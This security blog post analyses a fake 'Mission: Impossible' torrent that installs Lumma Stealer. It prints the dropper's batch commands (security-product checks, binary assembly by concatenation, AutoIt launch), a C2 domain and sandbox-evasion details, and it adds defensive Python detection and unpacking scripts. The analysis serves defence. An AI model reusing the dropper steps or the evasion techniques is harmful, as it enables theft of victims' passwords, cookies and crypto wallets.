Fake Download of Mission: Impossible – The Final Reckoning Movie Deploys Lumma Stealer

Silviu STAHIE

May 23, 2025


Mission: Impossible – The Final Reckoning is now in theaters, and many of the publicly available peer-to-peer sharing websites are already offering the movie as a download. Public interest in such a blockbuster gives cyberattackers a way to serve dangerous malware through unorthodox means.

Downloading movies from torrent websites is illegal, but people still do it. Many of these indexers offer real TV shows and films, so it's very easy for attackers to slip in malware, especially under the guise of a blockbuster movie everyone wants to see.

Key Findings:

  • Cybercriminals are using torrent websites to spread a very powerful malware named Lumma stealer.
  • Victims are tricked into believing they downloaded a real movie or TV show. In this particular case, it's the yet-unreleased blockbuster Mission: Impossible – The Final Reckoning.
  • The malware tries to remain hidden from security solutions.
  • Before deploying Lumma stealer, criminals also used AutoIt to automate various scripts.
  • After installation, the malware will steal passwords, cookies, crypto wallets, credentials from remote desktop tools, and much more.

Mission: Impossible – The Final Reckoning is not the only big name attackers use to push this malware. In fact, indexers have become fertile ground for all kinds of info stealers, especially in the past year. For example, whenever a TV show becomes very popular, new episodes that are, in fact, malware will become available for download a few days before the actual episode even airs.

Opening the file is enough

When a user downloads something that looks like a video file, the attackers try to hide their intentions. They will sometimes use an extension like ".mkv.lnk" or similar. In this case, they use a file with the ".arj" extension.

ARJ is an archaic type of archive that's been around for more than 30 years, but it's hardly used today. This is important because there's a good chance users won't recognize the file format.

On the other hand, file archivers like 7-Zip or WinRAR will recognize and open the ARJ file format. Inside, the attackers are offering a self-extracting archive with the .EXE extension.

The file is presented as Mission.Impossible.The.Final Reckoning.2025.1080p.WEB-DL.DDP5.1.x265-NeoNoir.arj

It's disguised as a standard video file. However, after extraction, it reveals multiple files, most notably a self-extracting executable named Mission.Impossible.The.Final.Reckoning.2025.1080p.WEB-DL.DDP5.1.x265-NeoNoir.exe

The execution chain breakdown is very interesting. Bitdefender researcher Victor Vrabie took the malware apart, bypassed the numerous obfuscation techniques and revealed how users' devices get infected.

Initial execution:

When the user runs the file, the executable initiates a batch script, Mary.eps.bat, that performs a complex sequence of actions.

Batch script operations:

Sets misleading environment variables, such as:

  • Set ONFSgeGlzGmusxkYLLOXThHcOrPOzFzejrjgqPc=Extraordinary[.]com
  • Set dTeVBjCFnZHCa=5

Checks for running processes that belong to known security solutions (opssvc, wrsa, bdservicehost, SophosHealth, AvastUI, AVGUI, nsWscSvc, ekrn).

Introduces a deliberate delay (ping -n 209 127.0.0.1) if security processes are detected.

Payload assembly:

Creates a temporary directory named %Delicious% (numeric value set to 592984).

Uses tools such as 'extrac32' to extract embedded resources (Experiments.eps).

Constructs a malicious binary (Extraordinary[.]com) through concatenation:

set /p ="MZ" > %Delicious%\Extraordinary[.]com <nul
findstr /V "RESPECTIVE" Centre >> %Delicious%\Extraordinary[.]com
copy /b %Delicious%\Extraordinary[.]com + Slots + All + Is + Cached + Drums + Animals + Canadian + Understand + Beneficial + Research + Briefs %Delicious%\Extraordinary[.]com

AutoIt script execution:

Combines additional encrypted payload components (Ties.eps, Encounter.eps, etc.) into a final AutoIt executable (t.a3x):

cmd /c copy /b ..\Ties.eps + ..\Encounter.eps + ..\Describe.eps + ..\Tracked.eps + ..\Rover.eps + ..\Distinguished.eps + ..\Indexes.eps t.a3x
start Extraordinary[.]com t.a3x
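The batch stage described above (security-product process checks, a ping stall, the "MZ" header written with set /p, findstr /V stripping, copy /b concatenation, extrac32, and the .a3x hand-off) can be triaged statically before anything is detonated. The script below is an added example, not Bitdefender's code: it applies a handful of heuristic rules to each line of a batch file and scores the result. The sample script it runs on is constructed to mirror the article's description (with the defanged Extraordinary[.]com written out as the real file name Extraordinary.com); the rule names and the three-rule threshold are this example's own choices.

```python
"""Static triage of a Windows batch dropper (added example, not the article's code).

Each line is lowercased and matched against heuristic rules for the behaviours
the article describes. The constructed sample below is not the real Mary.eps.bat.
"""
import re
from dataclasses import dataclass

# Security-product process names the article says the script looks for.
AV_PROCESSES = ("opssvc", "wrsa", "bdservicehost", "sophoshealth",
                "avastui", "avgui", "nswscsvc", "ekrn")

# A ping loop of this many echoes or more is treated as a deliberate stall.
PING_STALL_THRESHOLD = 30


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line in the script
    rule: str      # rule name
    text: str      # offending line, stripped


# (rule name, regex applied to the lowercased line). Heuristics, not signatures.
RULES = [
    ("av-process-check", re.compile(r"tasklist.*\b(?:%s)\b" % "|".join(AV_PROCESSES))),
    ("mz-header-write", re.compile(r'set\s*/p\s*=\s*"mz"')),
    ("findstr-strip", re.compile(r"\bfindstr\s+/v\b")),
    ("binary-concat", re.compile(r"\bcopy\s*/b\s+\S+(?:\s*\+\s*\S+){2,}")),
    ("extrac32", re.compile(r"\bextrac32\b")),
    ("autoit-a3x", re.compile(r"\.a3x\b")),
    ("start-com-file", re.compile(r"\bstart\s+\S+\.com\b")),
    ("long-random-env-var", re.compile(r"^\s*set\s+[a-z]{20,}=")),
]
PING_RE = re.compile(r"\bping\s+-n\s+(\d+)\s+127\.0\.0\.1")


def analyze_batch(script: str) -> list:
    """Return every rule hit, one Finding per (line, rule)."""
    findings = []
    for no, raw in enumerate(script.splitlines(), start=1):
        line = raw.strip()
        low = line.lower()
        for name, rx in RULES:
            if rx.search(low):
                findings.append(Finding(no, name, line))
        m = PING_RE.search(low)
        if m and int(m.group(1)) >= PING_STALL_THRESHOLD:
            findings.append(Finding(no, "ping-stall", line))
    return findings


def triage(script: str) -> dict:
    """Summarise hits; three or more distinct behaviours is treated as suspicious."""
    findings = analyze_batch(script)
    rules = sorted({f.rule for f in findings})
    return {"rules": rules, "suspicious": len(rules) >= 3, "findings": findings}


# Constructed sample modelled on the article's description (not the real script).
SAMPLE_BAT = r"""@echo off
set ONFSgeGlzGmusxkYLLOXThHcOrPOzFzejrjgqPc=Extraordinary.com
set dTeVBjCFnZHCa=5
set Delicious=592984
tasklist | findstr /i "bdservicehost wrsa opssvc ekrn" >nul && ping -n 209 127.0.0.1 >nul
mkdir %Delicious%
extrac32 /y /e Experiments.eps %Delicious%
set /p ="MZ" > %Delicious%\Extraordinary.com <nul
findstr /V "RESPECTIVE" Centre >> %Delicious%\Extraordinary.com
copy /b %Delicious%\Extraordinary.com + Slots + All + Is + Cached %Delicious%\Extraordinary.com
cmd /c copy /b ..\Ties.eps + ..\Encounter.eps + ..\Describe.eps t.a3x
start Extraordinary.com t.a3x
"""

if __name__ == "__main__":
    result = triage(SAMPLE_BAT)
    print("suspicious:", result["suspicious"])
    for f in result["findings"]:
        print(f"line {f.line_no:>2} {f.rule:<22} {f.text}")
```

Any single rule can fire on benign administration scripts (a long environment variable name, a copy /b of log fragments), which is why the verdict is based on how many distinct behaviours co-occur rather than on any one hit.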

It's worth noting that the AutoIt scripting language is used to automate actions within the Windows GUI and perform various scripting tasks. It has legitimate uses, which is why criminals employ it: they expect a greater chance of bypassing security checks, which helps the malware persist on the system.

Cybercriminals frequently abuse AutoIt because it is straightforward to write and compile into executables (.exe), which simplifies malware distribution.

RC4 encryption, shellcode injection, and anti-analysis

  • The AutoIt script (MD5: 1525cb22bf5ce9b7b2defbb7be0bddbd) injects and executes shellcode to decrypt embedded binary data using RC4 encryption.
  • Shellcode dynamically resolves APIs via the Process Environment Block (PEB), which tends to complicate detection.
  • Payload extraction monitored via Windows API calls (RtlDecompressFragment) eventually yields Lumma Stealer (MD5: fad0463794762de0bde1396c73811e7e).
  • Includes sandbox detection techniques, checking specific hostnames, usernames, and files (C:\aaa_TouchMeNot_.txt).
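When the key and the encrypted blob have been recovered from the script or from memory, the same RC4 primitive the shellcode uses recovers the embedded binary. The following is an added example written for this article, not Bitdefender's tooling: a plain RC4 implementation, a cheap "is this a PE image" sanity check on the decrypted output, and a key-trial loop. The key names and the PE-like blob are constructed for the demo; the real sample's key is not on the page.

```python
"""RC4 unpacking helper for analysts (added example, not the article's code).

RC4 is symmetric, so one routine both encrypts and decrypts. The PE check is
just the DOS 'MZ' signature plus the 'PE\0\0' signature at e_lfanew.
"""
from typing import Iterator, List, Optional


def rc4_keystream(key: bytes) -> Iterator[int]:
    """Key-scheduling algorithm (KSA) followed by the PRGA keystream."""
    if not key:
        raise ValueError("RC4 key must not be empty")
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    while True:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        yield s[(s[i] + s[j]) & 0xFF]


def rc4(key: bytes, data: bytes) -> bytes:
    """Encrypt or decrypt data with RC4 under key."""
    ks = rc4_keystream(key)
    return bytes(b ^ next(ks) for b in data)


def looks_like_pe(blob: bytes) -> bool:
    """Sanity check on decrypted output: MZ header and PE signature at e_lfanew."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    if e_lfanew + 4 > len(blob):
        return False
    return blob[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def try_keys(ciphertext: bytes, candidates: List[bytes]) -> Optional[bytes]:
    """Return the first candidate key whose decryption yields a PE image, else None."""
    for k in candidates:
        if looks_like_pe(rc4(k, ciphertext)):
            return k
    return None


def build_fake_pe() -> bytes:
    """Constructed minimal PE-like blob: 'MZ', e_lfanew = 0x40, 'PE\0\0' at 0x40."""
    hdr = bytearray(0x44)
    hdr[0:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")
    hdr[0x40:0x44] = b"PE\0\0"
    return bytes(hdr) + b"\x00" * 32


if __name__ == "__main__":
    # Constructed key and blob; nothing here comes from the real sample.
    key = b"constructed-key"
    encrypted = rc4(key, build_fake_pe())
    found = try_keys(encrypted, [b"wrong-guess", key])
    print("recovered key:", found)
    print("decrypted is PE:", looks_like_pe(rc4(found, encrypted)))
```

The check on the decrypted output matters more than it looks: with a wrong key RC4 produces plausible-looking noise, and the "MZ"/"PE" test is the quickest way to tell a correct key from a near miss before handing the blob to a disassembler.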

Lumma stealer is one of the more popular info stealers at the moment, especially since it's available via Darknet for anyone to buy. The version used in this movie download was compiled very recently, meaning it’s likely one of the latest versions. The malware has a number of features that make it very dangerous and capable of extracting a huge amount of sensitive data.

  • Performs data harvesting from browsers (credentials, cookies, autofill information).
  • Targets cryptocurrency wallets (MetaMask, Binance, and many others).
  • Can collect credentials from remote desktop tools.
  • Makes persistent registry entries (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run).
  • Exfiltrates data through encrypted HTTP/HTTPS POST to command-and-control servers (pricegxzm.run, among others).
  • It uses memory injection and process hollowing techniques that help it evade detection.
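The persistence entry under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run is the easiest of the listed behaviours to check for on a suspect machine. The script below is an added example, not Bitdefender's code: it scores each Run value on where the executable lives, what extension it has, whether a LOLBin launcher is being used to run a script, and whether the value name looks machine-generated. The registry read only works on Windows (it silently returns nothing elsewhere); the scoring logic is pure and is exercised on a constructed set of entries, and the directory and launcher lists are this example's own heuristics.

```python
"""Triage of HKCU Run persistence entries (added example, not the article's code).

score_run_entry() is pure and testable anywhere; read_hkcu_run() uses winreg
and therefore only returns data on Windows. SAMPLE_RUN is constructed.
"""
import re
from typing import Dict, List, Tuple

RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Run"

# Directories a normal user can write to; autoruns pointing here deserve a look.
USER_WRITABLE = (r"\appdata\local\temp", r"\appdata\roaming", r"\appdata\local",
                 r"\users\public", r"\programdata", r"\downloads")
# Extensions rarely seen on legitimate Run values (.com and .a3x match the article).
ODD_EXT = (".com", ".a3x", ".bat", ".cmd", ".vbs", ".js", ".scr")
# Built-in launchers commonly used to run a script from an autorun value.
LAUNCHERS = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe",
             "mshta.exe", "rundll32.exe", "regsvr32.exe", "autoit3.exe")


def split_command(command: str) -> Tuple[str, str]:
    """Separate the executable from its arguments, honouring a quoted path."""
    cmd = command.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        if end > 0:
            return cmd[1:end], cmd[end + 1:].strip()
        return cmd.strip('"'), ""
    parts = cmd.split(None, 1)
    return parts[0], (parts[1] if len(parts) > 1 else "")


def random_looking(name: str) -> bool:
    """Heuristic: long, all-letter value names with almost no vowels."""
    low = name.lower()
    if len(low) < 10 or not low.isalpha():
        return False
    vowels = sum(c in "aeiou" for c in low)
    return vowels / len(low) < 0.25


def score_run_entry(name: str, command: str) -> List[str]:
    """Return the list of reasons this Run value is suspicious (empty if none)."""
    exe, args = split_command(command)
    low_cmd, low_exe, low_args = command.lower(), exe.lower(), args.lower()
    reasons = []
    if any(d in low_cmd for d in USER_WRITABLE):
        reasons.append("user-writable-path")
    if low_exe.endswith(ODD_EXT):
        reasons.append("unusual-executable-extension")
    if low_exe.endswith(LAUNCHERS) and any(e in low_args for e in ODD_EXT):
        reasons.append("launcher-with-script-argument")
    if random_looking(name):
        reasons.append("random-looking-value-name")
    return reasons


def audit(entries: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each flagged value name to its reasons; clean entries are omitted."""
    return {n: r for n, c in entries.items() if (r := score_run_entry(n, c))}


def read_hkcu_run() -> Dict[str, str]:
    """Read the current user's Run key; returns {} where winreg is unavailable."""
    try:
        import winreg
    except ImportError:
        return {}
    entries = {}
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, RUN_KEY) as key:
        index = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, index)
            except OSError:
                break
            entries[name] = str(value)
            index += 1
    return entries


# Constructed entries: two ordinary autoruns and two modelled on the article's chain.
SAMPLE_RUN = {
    "OneDrive": r'"C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background',
    "SecurityHealth": r"C:\Windows\System32\SecurityHealthSystray.exe",
    "qkzmvtprwlhx": r"C:\Users\alice\AppData\Local\Temp\592984\Extraordinary.com t.a3x",
    "Updater": r'cmd.exe /c "C:\Users\alice\AppData\Roaming\Mary.eps.bat"',
}

if __name__ == "__main__":
    live = read_hkcu_run()
    for name, reasons in audit(live or SAMPLE_RUN).items():
        print(f"{name}: {', '.join(reasons)}")
```

On a live Windows host the script audits the real key; elsewhere it falls back to the constructed sample so the logic can still be exercised. A clean result here says nothing about the other persistence locations Lumma could use, so treat this as one check among several rather than a verdict.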

Lumma stealer is clearly used extensively by criminals to infect people who download movies and TV shows from shady sources, but it's not the only place it can be found. It's also present in all kinds of downloads for fake game trainers, cracked software, and many others.

In fact, there's always a chance people will download malware, especially if the source of the download is illegal and if the item they're searching for is very popular, like the latest Mission Impossible movie.

Fortunately, an international effort has already hit the Lumma stealer infrastructure, and at least for now, the malware has been severely affected. Users must also be aware that Lumma stealer is not the only malware criminals use via torrents and by utilizing known TV shows and movies.

Author


Silviu STAHIE

Silviu is a seasoned writer who has followed the technology world for almost two decades, covering topics ranging from software to hardware and everything in between.